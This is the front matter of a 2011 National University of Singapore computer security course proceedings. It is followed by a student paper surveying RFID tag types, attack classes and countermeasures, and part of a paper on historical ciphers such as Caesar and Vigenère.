CS3235-SemI-2011-12 - School of Computing

Transcription

CS3235-SemI-2011-12 - School of Computing
NATIONAL UNIVERSITY OF SINGAPORE
SCHOOL OF COMPUTING
CS3235 - Semester I,
2011-2012
Computer Security
The Project Proceedings
for CS3235 - Computer Security
November 2011
Singapore
ii
Table of Contents
The Security of RFID and its Implications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Kang Jun Lee, Jack Aw Yong, Raphael Wun
(Gp 1)
Cryptography: From a Historical Perspective . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Wei Xiang Lim, Kok Wei Ooi, Tuan Kiet Vo
and Mei Xin Shirlynn Sim
(Gp 2)
Elliptic Curve Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
Guan Xiao Kang, Chong Wei Zhi, Cheong Pui Kun Joan
(Gp 3)
Security Requirement in Different Environments. . . . . . . . . . . . . . . . . . . . . . . . . . . .53
Ru Ting Liu, Jun Jie Neo, Kar Yaan Kelvin Yip, Junjie Yang
(Gp 4)
Integer Factorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Romain Edelmann, Jean Gauthier, Fabien Schmitt
(Gp 5)
A Study into the Underlying Techniques Deployed in Smart Cards . . . . . . . . 109
Clement Tan, Qi Lin Ho, Soo Ming Poh
(Gp 6)
Analysis of Zodiac-340 Cipher. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .125
Yuanyi Zhou, Beibei Tian, Qidan Cai
(Gp 8)
The sampler of network attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139
Guang Yi Ho, Sze Ling Madelene Ng, Nur Bte Adam Ahmad
and Siti Najihah Binte Jalaludin
(Gp 9)
Report for the Study of Single-Sign-On (SSO), an introduction and comparison
between Kerberos based SSO and OpenID SSO . . . . . . . . . . . . . . . . . . . . . . . . . . . 163
Xiao Zupao
(Gp 10)
iii
Table of Contents
An Exploration into the Various Authentication Methods Used to Authenticate
Users and Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
Gee Seng Richard Heng, Horng Chyi Chan, Huei Rong Foong
and Wei Jie Alex Chui
(Gp 11)
Different strategies used for securing IEEE 802.11 systems; the strengths and
the weaknessess . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Cheng Chang, Yu Gao
(Gp 12)
Malicious Software: From Neumann’s Theory of Self-Replicating Software to
World’s First Cyber Weapon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Kaarel Nummer t
(Gp 13)
Password Authentication for Web Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219
Shi Hua Tan, Wen Jie Ea, Rudyanna Tan
(Gp 14)
Data Security for E-transactions: Online Banking and Credit Card Payment
System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 239
Jun Lam Ho, Alvin Teh, Kaldybayev Ayan
(Gp 15)
A Review of the Techniques Used in Detecting Software Vulnerabilities . . . . 257
Nicholas Kor, Cheng Du
(Gp 17)
Intrusion and Prevention System Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
Tran Dung, Tran Cong Hoang
(Gp 18)
An exploration into what Public Key Infrastructure is, how it’s implemented,
and how the greatest vulnerability of the Public Key Infrastructure has nothing
to do with their keys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283
Laurence Putra Franslay
(Gp 19)
iv
The Security of RFID and its Implications
Kang Jun Lee, Jack Aw Yong, Raphael Wun
School of Computing, National University of Singapore
Abstract. The wide usage of RFID tags has largely increased its market value,
and this made the security of RFID tags increasingly important. In this report,
we investigate the security and vulnerability of the RFID tags by measuring it
theoretically, as well as through real-life examples. Besides, we also look into
the countermeasures and protocols against the attacks on RFID tags, bring out
some of the existing methods on preventing the attacks, and as well do a brief
suggestion of our own on how to improve its security level.
Keywords: RFID, Security, vulnerability of RFID, security of RFID, Radio
Frequency Identification
1
Introduction
Radio Frequency Identification is what we commonly knew as RFID and it has been
around for decades. Its history can be traced all the way back to the Second World
War. The Germans, Japanese, Americans and British were all using radar during the
war to warn of approaching planes while they were still miles away. However, there
were unable to differentiate between friendly and hostile planes. The Germans
discovered that if pilots rolled their planes as they returned to base, it would change
the radio signal reflected back. This method indicated to the radar crew on the ground
that those were German planes and not allied aircraft (this is, essentially, the first
passive RFID system). The British on the other hand developed the first active
identify friend or foe (IFF) system. They installed a transmitter on each of their planes.
When it received signals from radar stations on the ground, it began broadcasting a
signal back that identified the aircraft as friendly. RFID works on this same basic
concept. A signal is sent to a transponder, which activates the integrated chip and
either reflects back a signal (passive system) or broadcasts a signal (active system).
[1]
RFID patents were first made in the U.S by Mario W.Cardullo on January 23 1973.
He invented an active RFID tag with rewritable memory. Also in the same year,
Charles Walton received a patent for a passive transponder user to unlock a door
without a key. [1] Over the years, such technology has evolved and people are
discovering more ways they can apply RFID to. It has evolved in such a way that it is
replacing the barcode technology that we are familiar with. In the absence of contact
or direct line of sight, which barcode technology requires, communication of
1
information still takes place. A simple RFID system can be made up of three
components. They are i) an antenna, ii) a RFID reader and iii) a RFID tag.
The antenna of the RFID system broadcasts radio signals to activate the RFID tags
in order to read and write data to it. The RFID reader broadcasts radio waves and its
strength depends on the output power and the radio frequency being used. The read
range can be as little as one inch and can span as far as 100 feet or more. When the
RFID tag is within the reader‟s broadcast range, the tag is activated and the reader
decodes the data that is encoded in the tag‟s silicon chip. The decoded data can then
be passed to a host computer for processing.
Since the birth of RFID technology, it has become cheaper over the years to
implement such a system. As a result we come into contact with it in different areas of
our work and life. As this technology becomes more pervasive, just how secure is the
data that is being transmitted? In this research report we would be exploring on the
different RFID tags that are in the market, some examples of usages of RFID and
investigate on how secure are RFID systems that are around us and we hope to be
able to give suggestions or improvements to enhance the infrastructure.
2
Introduction to RFID and its Security
2.1 Types of RFID Tags
As discussed earlier, RFID tags can be active or passive, below are a list of active and
passive tags that are being used currently.
2.1.1 Active RFID Tags
Such tags have a radio signal transceiver a battery onboard to power it. The integrated
power supply allows the tag to activate itself regardless of whether a RFID reader is
in proximity. Active RFID tags have longer read ranges because of this integrated
power supply as compared to passive RFID tags that have no battery and integrated
transceiver.
Active RFID tags are commonly used together with Real Time Location Systems
(RTLS) because of its characteristics. The embedded battery also allows extra sensors
to be powered, i.e. for humidity, temperature, pressure measurement.
2
2.1.2 Passive RFID Tags
Passive RFID tags do not have an embedded transceiver and battery and it therefore
has a shorter read range as compared to active RFID tags and Battery-Assisted
Passive RFID tags. When a passive tag enters a field generated by a reader, it is being
activated and it responds by “reflecting” the reader‟s modulated signal; this technique
is called “backscatter”. The reader will then receive and decode the response.
Passive RFID tags are low in price and they are commonly used for a wide range of
applications in the market but it is rarely used for RTLS because of the way it is being
activated. Such tags cannot embed extra sensors as it does not have an integrated
power supply.
2.1.3 Battery-Assisted Passive (BAP) RFID tags:
BAP RFID tags are basically passive RFID tags in nature and it also uses backscatter
to work, but it has an integrated battery that keeps the integrated chip in a stand-by
mode. Passive RFID tags read ranges are often short as power is required to channel
to the integrated chip to activate it. The distance between the reader and the passive
tag would determine whether the minimum energy threshold is achieved to activate
the integrated chip.
With the battery in BAP RFID tags, it helps to overcome the minimum energy
threshold to activate the tag and thereby increasing the read distance. When the
battery is depleted, a BAP RFID tag behaves just like a regular passive RFID tag.
BAP RFID tags are more expensive than regular passive tags but are cheaper than
active tags.
2.1.4 Passive RFID tags with Solar panel and Ultracapacitor:
Such chips function very similarly to BAP RFID tags, it uses the combination of the
built-in solar panel and ultracapacitor instead of a battery. In lighted conditions, the
solar panel provides energy to the RFID tag to enable it to have longer read ranges
and at the same time the ultracapacitor is being changed. Under poor light conditions
or total darkness, the ultracapacitor therefore able to maintain its read performance for
many hours dues to the stored energy is the ultracapacitor.
If it remains in dark for too long a time, the energy in the ultracapacitor would be
depleted and it would function like a normal passive RFID tag till it is exposed to
light again.
3
2.1.5 Semi-passive RFID tags:
A semi-passive RFID tag still uses the backscatter technique to communicate with
the reader. It has a battery that is used to power on-board microcontrollers and extra
sensors, i.e. a temperature logger. When the battery is depleted, the semi-passive
RFID tag stops transmitting any signal.
2.2 Applications of RFID Tags
Smart Cards
Passports
The above 2 applications of RFID tags contain valuable information to individuals
as well as corporations. RFID smart cards can be used in as security access cards like
the NUS Matriculation card, transport cards like our EZ-link cards and even credit
cards. RFID passports contains information regarding its holder and the holder will
face a theft of identity should a hacker be able to obtain the information.
4
There are of course other usages of RFID tags that do not contain sensitive
information. For example, RFID tags are used in libraries, where the books are being
tagged such that they can be located easily and it prevents unauthorized checkouts by
triggering the alarm. RFID tags are also used in marathon races to record the runner‟s
start and end timings, such tags are commonly termed as “champion tags. RFID tags
are also used by corporations to track their shipments and aid in their logistics
accounting in the warehouse. Workers will no longer need to physically count the
number of products or scan barcodes to obtain the necessary information.
2.3 Security on RFID
2.3.1 Security of RFID Passports
An RFID passport uses Basic Access Control (BAC) to prevent personal information
being extracted without authorization. BAC uses data such as the passport number,
date of birth and expiration date to obtain a session key. This key is then being used to
encrypt the communication between the passport‟s integrated chip and a reading
device. This mechanism is supposed to ensure that the owner of a passport can decide
who can read the electronic contents of the passport. [2]
It also uses Extended Access Control (EAC) to protect other sensitive data such is
information for iris recognition and fingerprint recognition. There are 2 types of
EACs to be implemented with the BAC for passports issued in the European Union.
They are the EAC Chip Authentication (CA) and the EAC Terminal Authentication
(TA). [3]
The main aim of the CA segment is to check and ensure that the chip in the in the
passport is not cloned and establish a secured communication channel.
The TA segment is used to determine whether an Inspection System for the
passport is allowed to read the sensitive data stored in the passport and it uses card
verifiable certificates issued by a document verifier. The lifespan of each certificate
ranges between a day to a month. An Inspection System may hold several of such
certificates and each belongs to a country that allows the system to read the stored
data.
5
2.3.2 Security of Smart Cards
The above table shows the various RFID frequencies together with their
capabilities and applications.
The EZ link cards as well as a variety of smart cards available in the market,
function under the High Frequency Range of 13.56Mhz. Some examples of
encryption techniques that are being used on such smarts cards are the Triple DES
technique, Secure Hash Algorithm (SHA-1) and Crypto-1.
Triple DES uses the Data Encryption Standard (DES) cipher algorithm three times
to each of the data blocks. By performing the encryption technique three times, it
increases the key size to protect against brute force attacks and therefore increasing its
reliability.
The SHA-1 hash algorithm has a hash value length of 160 bits. It is boasted to be
more secure than the MD5 algorithm and is used in secure protocols like SSH and
SSL.
Crypto-1 is made up of a 48-bit feedback shift register for the main secret state of
the cipher, a linear function, a 2-layer 20 to 1 nonlinear function and a 16-bt LFSR
which is used during the authentication phase. However this function is not secure,
yet it was being implemented in subway card systems.
6
3
Vulnerability of RFID systems
The invention of RFID does bring much convenience into our daily life. The cards
that we use for taking transportation or making payments are great illustrations on the
usage of RFID. However, RFID and its systems do possess a series of vulnerabilities
that are susceptible to a broad range of malicious attack, which include pervasive
eavesdropping to active interference.
The reason why RFID is prone to such attacks is due to its contactless nature.
Hackers could probably have many ways to gain information from the cards that
make use of such mechanism. Hence it is hard to find good methods that
countermeasure such attacks.
3.1 Classification of RFID Attacks
Figure 1. Classification of RFID Attacks
Extracted from Classifying RFID Attacks and Defenses by
Aikaterini Mitrokotsa, Melanie R. Rieback, Andrew S. Tanenbaum [4]
7
The different types of RFID Attacks can be categorized into 4 different layers Physical Layer, Network-Transport Layer, Application Layer and Strategic Layer.
Apart from that, there are attacks that can be targeted at multiple layers. [4]
In this research paper, only a handful of attacks will be picked to describe something
relevant to our daily life. Prior to diving into the details of attacks associating with the
layers, a short description will be attached, talking about how susceptible it is to its
vulnerabilities. The mechanism of each attack will be described as well, and a
possible scenario is to be attached to how closely it would be to the routine usage of
RFID.
3.1.1 Physical Layer
The physical layer in RFID communications comprises of a physical interface,
radio signals, and RFID devices that send or receive information between the card.
What can really possible happen is that in the nature of RFID where wireless
communication is concerned, it has poor physical security and lacks of resilience
against any physical manipulation. There are attacks that could either permanently or
temporarily disable RFID tags, as well as relay attacks.
3.1.1.1 Permanent disabling of RFID
RFID tags are extremely sensitive to static electricity. It can be damaged instantly
by electrostatic discharge caused by high energy waves. In this manner, the RFID tag
will deactivate passive RFID tags permanently. For active RFID tags, the battery can
be discharge through extremely high or low temperature.
3.1.1.2 Temporary disabling of RFID
There are two types of attacks that can temporarily disable RFID tags:
(i) Passive Interference: When RFID network is operated in an unstable and noisy
environment, it is prone to possible interference and collisions from any source of
radio interference (e.g. electronic generators or power switching supplies). Such
interference can prevent accurate and efficient communication between the tag and
the reader.
(ii) Active jamming: An adversary can take advantage of RFID's characteristic of
listening indiscriminately to all radio signals in its range. In this way, one could create
signals within the same range that could prevent the tags from communicating
efficiently with the readers.
8
3.1.1.3 Relay attacks
An adversary will act as a man-in-the-middle. Basically what it means is something
an adversarial device is placed between a legitimate RFID tag and a reader. The
adversarial device is able to intercept and modify the radio signals as it is receiving
communications from both the legitimate tag and legitimate reader.
Relay attacks can further categorized in two types:
(i) Mafia fraud: It is to involve the existence of an illegitimate party that relays
information between two legitimate parties.
(ii) Terrorist fraud: Involves with cooperation of dishonest but legitimate tag by
relaying information to the illegitimate third party. However, the dishonest but
legitimate tag does not share secrets with the relaying illegitimate party.
3.1.2 Network - Transport Layer
The attacks on this layer is based on how RFID systems communicate, as well as
the way data being transferred between entities (reader, tag) of an RFID network.
3.1.2.1 Cloning
This refers to replicating a clone of an RFID tag. If a RFID tag does not have any
forms of security features, cloning is as simple as copying the tag's ID and any
associated data to the clone tag. However, if the tag has extra security features, then
the attacker needs to perform a much sophisticated attack such that the reader is being
fooled in accepting the clone tag as a legitimate one. Eventually, cloning tags causes
confusion and violation of system integrity.
3.1.2.2 Spoofing
A variant of cloning that does not physically replicate the RFID tag. Basically it
employs the use of special devices with increased functionality that are able to
emulate the RFID rags given some data content. The adversary will in turn take the
impersonation of a valid RFID tags to gain privileges to gain communication as per
the original tag.
9
3.1.2.3 Reader Attacks
(i) Impersonation: Since RFID communication is most of the time unauthenticated,
adversaries may easily make counterfeits as identity of real tag readers to elicit
sensitive information or modify data. Interestingly, such attacks can be ranged from
very easy to "practically impossible".
(ii) Eavesdropping: The wireless nature of RFID makes eavesdropping one of the
serious and easily deployable threats. An unauthorized individual an use an antenna in
order to record communications between legitimate tags and readers The feasibility
of this attack depends on factors like say distance of attacker and legitimate RFID
devices.
3.1.3 Application Layer
The attacks on this layer are mostly related to applications and the binding between
users and RFID tags. Such attacks employ unauthorized tag reading, modification of
tag data and attacks in application middleware.
3.1.3.1 Tag modification
An adversary can make use of writable memory and exploit on attacks that could
modify or delete valuable information. This depends on whether the RFID standard
use and its protection on read/write is employed. The amount of impact on such
attacks depend largely on what tags are being used, as well as the degree of
modifications made, especially on tagging objects or humans' critical information.
Eventually, if the reader is being fooled that the tag is an unmodified tag, the
adversary can write falsified information into the tag. This could intensify an
aftermath, especially if one talks about having an RFID tag containing a patient's
information and the drugs he is supposedly to take.
3.1.3.2 Middleware Attacks
Buffer overflow: Middleware is able to attack on fixed-length buffer. Basically, an
adversary can launch an attack by launching buffer overflow attack on backend of
RFI middleware.
Malicious Code Injection: Through the usage of injection such as an SQL injection,
an adversary is able to exploit on this and inject malicious codes that compromise the
backend RFID system. The attack based on an unexpected execution of SQL
statements that lead to unauthorized access to backend database and subsequently
reveal or modify data stored in backend RFID middleware.
10
3.1.4 Strategic Layer
Strategic layer is not visited in this report as the impact is not much applicable to
our fields of research.
3.1.5 Multilayer attacks
3.1.5.1 Denial of Service Attacks
Normal operation of RFID tags may be interrupted intentionally by blocking access to
them. Such deliberate blocking of aces and subsequent DoS can be caused by
malicious uses of "blocker tags" Another form of DoS attack will be the unauthorized
usage of LOCK commands. They include several RFID standard in order to prevent
unauthorized writing on RFID tags' memory.
3.1.5.2 Crypto attacks
Attackers can employ crypto attack to break employed cryptographic algorithms and
reveal or manipulate sensitive information. By performing for example a brute-force
attack, one an easily break the encryption key and obtain information.
3.2 Real world implications
As we can see from above, there are various way for a hacker to crack a RFID system.
For example, in 2008 a group of MIT students published apaper revealing information
on how to hack the RFID system belonging to the subway system in Boston that uses
Crypto-1. [5]
The above mentioned hack is not just restricted to the United States. Oyster card,
which is a United Kingdom‟s equivalent to Singapore‟s ez-link card, has been hacked
at the same year. A group of German scientists managed to crack the Mifare chip
within Oyster card and revealed how possible it is to take a free ride on London
transportation. [6]
They published a paper on the findings on a security exploit on the Mifare DESfire
MF3ICD40 which is commonly used as an RFID smart card. They used an approach
that was previously used to hack other wireless crypto systems. The attacker must
first have the smart card physically, an RFID reader and a radio probe. It then
11
performs a template “side-channel” attack on the card‟s crypto. Using differential
power analysis, data is being collected from radio frequency energy that leaks out of
the card (“side-channels). By performing this process, the entire 112-bit secret key of
the Mifare DESfire MF3ICD40 which uses Triple DES encryption was being
retrieved. [6][7]
There are more examples showing that the vulnerability is not just restricted to
public transport systems. A hacker in the United Kingdom has come out with a fast
and cheap way to crack RFID encryption on an American Express card. By spending
US$8, one can readily obtain a reader and software that is available on eBay to obtain
information from the card, and proceed with the cracking procedures. [8]
Same applies to electronic passports as well. Despite all the security measures that
most electronic passports claim to have, the information being stored in the RFID
passport is still not safe. Despite the presence of an encrypted session key, it was
discovered in recent months that researchers in the Netherlands have found a way to
read some stored information remotely. [9]
These examples show that even the relatively strong encryption algorithms used in
"touchless" smart cards can be cracked with a small investment of time and the right
equipment. Exposing the shared crypto key and the data stored on them. This shows
that many RFID systems around us are vulnerable, and more security measures have
to be implied to the system to ensure that the system is safe to be used.
4
Countermeasures for Attacks on RFID Systems
RFID attacks are easy, and hard to prevent due to its cheap and contact-free nature.
Even though it is possible to implement better encryption algorithm to prevent loss of
data confidentiality, it is very costly to implement such algorithms in a RFID chip,
which is not feasible for most RFID systems, since they are restricted to a lower price
(such as smart card for transport system), which also means limited resource on the
chip to implement such algorithms. [10]
Besides, most of the time confidentiality itself does not stop the hackers from
exploiting the system. For example, simply cloning the RFID chip would be able to
let the hackers achieve their goal, without having to know what is contained inside the
chip. It is a big challenge to ensure the security of such system, and many efforts have
been put into this issue. Besides the basic encryption and hashing that we use, there
are still other methods to prevent RFID attacks.
12
4.1
Authentication
Some RFID chips adopt policies to only enable reading by specified devices.
Unauthorized devices are not allowed to read from the chip, and this can prevent
sniffing of the chip by unauthorized readers. [11]
4.2
Physical Shielding
Besides things that can be improved on the system, there are ways to improve security
by the efforts of end user. We can make use of a physical method, which makes use of
a thing called the Faraday net (from electro-magnetic field theory, container made of
conductor can shield radio wave, and is called a Faraday net.). [12] The user can put
their RFID within a Faraday net all times, and take them out only when they meet the
need. This can prevent the RFID from being read unless the user is required to use
them, and this can prevent unwanted leakage of data from the RFID chips.
But, it is impossible to force every user to cultivate such habit, which makes this
method impractical to make use of. However this can be noted as a personal
countermeasure for anyone who wishes to keep their RFID materials safe.
4.3
Back-end monitoring
Since practically it is nearly impossible to make sure perfect security for cheap RFID
chip based systems, we can seek for another option, which is to „cure‟ instead of
„prevent‟. The idea is to constantly monitor the RFID back-end for any suspicious
actions (such as „possible cloned RFID access‟), and investigate on the issue when
detected. [13]
One of the example schemes that we can propose is this: Taking the example of
public transport cards (ez-link, oyster cards), the back-end can maintain integrity of
the card by storing usage information (time, location, etc.) on the card as well as the
back-end server when used. This way, the card will store the some of the recent usage
records. Since the card has usage history stored, cloned card will show a difference
with the original card if the cards are used more than once (by different user). This
will be reflected in the back-end server, since some of the access entries that exists at
the server will be missing from each of the cards. Once a mismatch is noticed, this
can be detected by the system, and then picked up to alert the system manager. The
actions to be taken next can be decided by the system manager.
This does not actually make the RFID system safer, but it can make the system less
exploitable without being noticed. This enables a quick response to be performed after
13
a misuse is detected, without suffering more losses from the consequences of the
misuse.
These are the extra countermeasures that can be taken in order to protect RFID
systems. They are an add-on to the basic security standards, which enables RFID to
achieve a better security level.
5
Conclusion
After looking at various RFID systems and their security standards, we have arrived
to a conclusion that RFID systems are vulnerable and needs to be improved with
newer standards. However there are big obstacles such as the low-cost restriction for
some systems, and also the contact-free communication characteristic of the RFID
chips. Although many security implementations, including encryption, hashing and
authentications are done, most of the RFID system is still vulnerable with various
types of attacks, which some of the being unavoidable. At this point, being self-aware
of the insecurity when using RFID based identification procedures becomes very
important, because system alone is unable to ensure perfect security at the moment.
Public awareness on insecurity of RFID should be raised, as this is currently still the
best way to prevent RFID attacks.
References
1. M. Roberti, “The History of Rfid Technology - Rfid Journal,” rfidjournal.com,
http://www.rfidjournal.com/article/view/1338/1 (accessed October 29, 2011).
2. Hopewell, Luke. Rfid, E-Passport Security at Risk: Aus Govt. ZDNet, May 31,2011.
http://www.zdnetasia.com/rfid-e-passport-security-at-risk-aus-govt-62300530.htm
3. D. Kugler, “Extended Access Control: Infrastructure and Protocol” (June 1, 2006),
http://www.interoptest-berlin.de, PDF file, http://www.interoptest-berlin.de/pdf/Kuegler__Extended_Access_Control.pdf
4. A. Mitrokotsa, M. R. Rieback, A. S. Tanenbaum. “Classifying RFID Attacks and Defenses.”
Amsterdam, n.d.
5. R. Ryan, Z. Anderson, A. Chiesa, “Anatomy
http://tech.mit.edu/V128/N30/subway/Defcon_Presentation.pdf
of
a
Subway
Hack”,
6. “Oyster card „free travel‟ hack to be released”, ITPRO.co.uk, July 22 2008,
http://www.itpro.co.uk/604770/oyster-card-free-travel-hack-to-be-released
14
7. S. Gallagher, “Researchers hack crypto on RFID smart cards used for keyless entry and
transit pass,” ars technica, Oct 11,2011,
http://arstechnica.com/business/news/2011/10/researchers-hack-crypto-on-rfid-smart-cardsused-for-keyless-entry-and-transit-pass.ars
8. Staff, SDN. Researchers hack popular smartcard used for access control. Security Director
News, Oct 18,2011. http://www.securitydirectornews.com/?p=article&id=sd201110z7V0yY
9. “RFID credit cards easily hacked with $8 reader”, Engadget.com, March 19 2008,
http://www.engadget.com/2008/03/19/rfid-credit-cards-easily-hacked-with-8-reader/
10. “Passport RFIDs cloned wholesale by $250 eBay auction spree”, theregister.co.uk,
February 2 2009, http://www.theregister.co.uk/2009/02/02/low_cost_rfid_cloner/
11. F. Klaus. “Known attacks on RFID systems, possible countermeasures and upcoming
standardisation activities.” 2009.
12. W. Qinghua, X. Xiaozhong, T. Wenhao, H. Liang. “Low-cost RFID: security problems and
solutions.”
13. D. N. Duc, H. R. Lee, Divyan M. Konidala, K. Kim. “Open Issues in RFID Security.”
Daejeon, 2009.
15
16
Cryptography:
From a Historical Perspective
Wei Xiang Lim, Kok Wei Ooi, Tuan Kiet Vo,
Mei Xin Shirlynn Sim,
Computing 1, 13 Computing Drive,
Singapore (117417), Republic of Singapore
{u0807150, u0906907, 0807235, u0806996}@nus.edu.sg
Abstract. In this paper, we studied a variety of cryptography systems that were
introduced during various time periods, from the classical ancient era till
modern times. With regards to each cipher, its characteristics, history, working
explanations or examples to attain message confidentiality, as well as the
limitations are addressed. Besides focusing on the aspect of encryption, some
cryptography systems in the modern context also do play an important role in
authenticating the identity of the sender.
Keywords: cryptography techniques, message confidentiality, security,
plaintext messages, cipher-texts, brute-force, cipher, monoalphabetic,
polyalphabetic, substitution, block, fractionating, digraph, encrypt, decrypt.
1
Introduction
The history of cryptography can be divided into four major phases, namely the
ancient age, before World War I period, War time and the Modern era.
Cryptography refers to the act of concealing written contents within messages
away from unintended recipients. In ancient times, cryptography is used largely for
private communications, art, religious and military purposes. During then,
cryptography was tantamount to encryption as the focus was mainly on converting
written messages into cipher-texts. This was done to ensure message confidentiality.
Message contents would be protected against unintended, albeit malicious recipients
during its delivery from one location to another. During ancient civilization to the
early twentieth century, cryptographers developed and performed considerably
uncomplicated algorithms on paper. This happened as early as 1900 B.C when
Egyptians engraved non-standard hieroglyphs in writing on payrus and wood.
In the modern era, as computer communications become prevalent, new
cryptography techniques were developed. These cryptography techniques are
supported by more complex mathematical functions and stronger scientific
approaches. As a result, the probability of cracking the encryption key using current
computational technology and algorithms within a reasonable time frame would
become relatively more difficult. With regards to communications and electronic
transactions over networks like the Internet, cryptography is deemed to be of
necessity so as to prevent malicious attacks. Besides ensuring message
17
confidentiality, modern cryptography goals also include ensuring message integrity,
authentication, and non-repudiation. In order to attain these goals, three cryptography
schemes, namely symmetric cryptography, asymmetric cryptography and hash
functions are used.
1.1 Purpose of Website
The aim of our “CryptograFreaks” website is to provide a learning platform for
people who are interested in the workings behind cryptographic systems. Visitors to
our website will be able to attempt to encode and decode their own messages with the
use of various cryptographic applets featured. In addition, we also endeavour to reach
out and enhance the learning experiences of visitors who have no prior knowledge
about the topic of cryptography. You can access our website at the following address:
http://www.freedom316.com/cryptografreaks
2
Ancient Cryptography
In this segment, we will be exploring two ancient cryptography techniques and its
features, specifically the Atbash cipher and Caesar cipher.
2.1 Atbash Cipher
(http://www.freedom316.com/cryptografreaks/atbash.php)
The Atbash cipher is a monoalphabetic substitution cipher for the Hebrew alphabet.
In 500 B.C, the Scribes in Israel wrote the book of Jeremiah using the Atbash
cipher. The Hebrew language consists of a few ciphers and the Atbash cipher is one
of them. From 500 B.C till 1300 A.D, the Atbash Cipher was used by the Jewish,
Gnostics, Cathars and Knights Templars to conceal important names from third
parties so as to avoid persecution. During then, Knights Templars were not allowed to
worship any other idols apart from God. However, due to the influence of St Bernard
Clairvaux, they came up with an encryption to represent their admiration for the
Greek Goddess of Wisdom, Goddess Sophia. Upon encryption, her name was
represented with the word, “Baphomet”. Unfortunately, it was made known shortly
that the Knight Templars have committed idolatry and many of them were captured
and sentenced to death. With the help of the Atbash cipher, other Knight Templars
managed to escape death sentence as the encrypted names belonging to them could
not be identified. It was only in the 20th century when a biblical scholar, Dr Hugh J.
Schonfield applied the use of the cipher to decipher words which he thought were
senseless. As a result, he uncovered the mysteries of Judaism’s history and the
Knights Templars.
The cipher reverses the alphabet by substituting the first letter of the alphabet with
the last, the second letter with the one before the last and etc. An example in the Latin
(Roman) alphabet would be of the following whereby “A” is substituted with “Z”,
18
“B” is substituted with “Y” and so on. Table 1(Refer to Appendix A) illustrates the
Atbash cipher in accordance to the Roman letters from A to J.
Since the Atbash Cipher is easily reversible, the original letter can be easily
decrypted and made known. Thus, the Atbash Cipher lacks complexity and hence,
provides minimal security which prevents encrypted messages from maintaining its
confidentiality.
2.2 Caesar cipher
(http://www.freedom316.com/cryptografreaks/caesar.php)
The Caesar cipher is a monoalphabetic substitution cipher. Due to the fact that there
are only 25 possible combinations for the substitution of each encrypted letter, it is
often perceived by many to be one of the simplest albeit, most renowned encryption
technique.
In 50 B.C, Julius Caesar was the first to utilize the Caesar cipher to ensure message
confidentiality in military and government communications among generals and
officials.
As seen in Table 2 (Refer to Appendix A)., each letter in the plaintext is substituted
with a letter whose fixed position is approximately a few spots away. For example,
with a shift of 3, the letter “A” would be substituted by D, B would be substituted by
E and etc.
Similarly like the Atbash cipher, the Caesar cipher is easily reversible and the
original letter can be decrypted easily by reversing the cipher. Since the Caesar cipher
lacks complexity, it offers negligible communication security and message
confidentiality. However, in ancient era, the Caesar cipher was deemed to be
relatively secure because many of Julius Caesar’s unintended recipients were illiterate
and even if they were literate, they would have thought that the cipher-texts were
written in an unidentified language. Nevertheless, Julian Caesar did attempt to
strengthen his encryption technique by replacing Greek Letters for Latin Letters so as
to enhance communication security and message confidentiality.
3
Before World War I Cryptography
In this segment, we will be exploring two cryptography techniques and its features,
specifically the Vigenère cipher and the Jefferson’s Wheel cipher.
3.1 Vigenère cipher
(http://www.freedom316.com/cryptografreaks/vigenere.php)
The Vigenère cipher is a polyalphabetic substitution. In order to encrypt plaintext
messages, different Caesar ciphers are used on the plaintext in accordance to letters
belonging to the specified key. The key denotes which cipher substitution will be used
for the encryption of each letter.
19
In 1586, French cryptographer and diplomat, Blaise de Vegenere, published his
invention of the text autokey cipher, which was later known to be the Vigenère cipher
in his book entitled, “Traicté des chiffres ou secrètes manières d'escrires”.
In the 19th century, the Vigenère cipher was used to encode messages which are
deemed to be confidential across telegram systems.
The Vigenère cipher is perceived to be more secure than other monoalphabetic
ciphers because it uses 26 different letters to encode a message. In order to decipher
the plaintext message, the recipient needs to be aware of the Vigenère tableau and the
key used by the sender.
The Vigenère tableau in Figure 1 (Refer to Appendix A) consists of a rectangular
matrix of 26 letters repeatedly written in every of the 26 rows, each letter being
shifted to the left of the previous row by 1 position according to the Caesar cipher.
If the sender of the plaintext message would like to encrypt the plaintext message,
“HELLO”, he would need to decide on a key. If he decides that the key is, “HEY”, he
would have to repeat the letters in the key until the length of the key matches with the
length of the plaintext message as shown in Table 3 (Refer to Appendix A).
With the given plaintext and key, the sender can locate each cipher letter within the
Vigenère Table by searching within the row of the key and column of the plaintext.
For example, the first letter of the key is “H”, thus the sender would need to locate the
row belonging to “H” and the column belonging to the plaintext “H”. The resultant
ciphertext is “O”.
Similarly, the Vigenère Cipher can be depicted using cipher discs and the keyword
specified by the sender can be used to verify the number of rotating positional shifts
which the inner discs have to perform.
Even though the Vigenère Cipher is perceived to be more secure and trusted, the
cipher-texts can still be decoded. For many years in the 19th century, the Vigenère
cipher was deemed to be “le chiffre indechiffrable” – “the unbreakable cipher”. This
is mainly because it was able to conceal plaintext letter frequencies which were used
in a direct manner. For instance, in the English language, E is often deemed to be the
most frequently used letter. If a certain letter within the cipher-text is most used
within a cipher-text, one would easily link E to the most-used cipher-text letter.
However, with the Vigenère cipher, the most-used letter within the cipher-text have
been encoded using different letters, thus this increases the difficulty of decoding the
plaintext message via frequency analysis.
However, in later years, the Vigenère cipher could be deciphered using brute force
and mathematical methods. This is due to the fact that the Vigenère cipher repeats the
letters of the key until the length of the key is equivalent to the length of the plaintext.
